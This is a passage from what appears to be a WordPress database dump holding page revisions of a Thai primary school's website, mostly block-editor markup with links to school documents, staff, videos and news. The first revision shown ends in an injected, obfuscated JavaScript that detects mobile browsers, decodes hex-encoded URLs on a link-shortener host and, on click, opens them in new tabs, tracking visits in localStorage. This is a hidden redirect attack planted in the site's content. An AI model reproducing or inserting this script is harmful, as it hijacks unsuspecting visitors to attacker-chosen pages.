wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:12:04','2024-08-30 03:12:04','',19,'http://watprato.ssk.in.th/?p=296',0,'revision','',0),
(297,2,'2024-08-30 10:12:34','2024-08-30 03:12:34','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 